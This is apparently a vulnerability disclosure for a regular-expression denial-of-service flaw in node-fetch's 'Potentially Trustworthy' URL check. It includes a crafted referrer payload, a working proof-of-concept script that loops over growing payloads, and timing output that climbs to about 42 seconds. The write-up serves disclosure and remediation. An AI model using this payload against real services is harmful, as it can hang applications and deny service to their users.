Description

Inefficient regular expression complexity regex when trying to match Potentially Trustworthy could lead to a denial of service attack. With a formed payload 'http://' + 'a.a.'.repeat(i) + 'a', 76 characters payload could take 42642 ms time execution.

Proof of Concept

// PoC.js
import fetch from 'node-fetch';

for (var i = 1; i <= 1000; i++) {
    var time = Date.now();
    var attack_str = 'http://' + 'a.a.'.repeat(i) + 'a'
    const response = await fetch(
        'https://google.com'/* any valid domain */,
        { "referrer": attack_str }
    )
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
}

Output

attack_str.length: 12: 248 ms
attack_str.length: 16: 242 ms
attack_str.length: 20: 231 ms
attack_str.length: 24: 231 ms
attack_str.length: 28: 247 ms
attack_str.length: 32: 233 ms
attack_str.length: 36: 218 ms
attack_str.length: 40: 244 ms
attack_str.length: 44: 232 ms
attack_str.length: 48: 230 ms
attack_str.length: 52: 240 ms
attack_str.length: 56: 263 ms
attack_str.length: 60: 406 ms
attack_str.length: 64: 893 ms
attack_str.length: 68: 2908 ms
attack_str.length: 72: 10775 ms
attack_str.length: 76: 42642 ms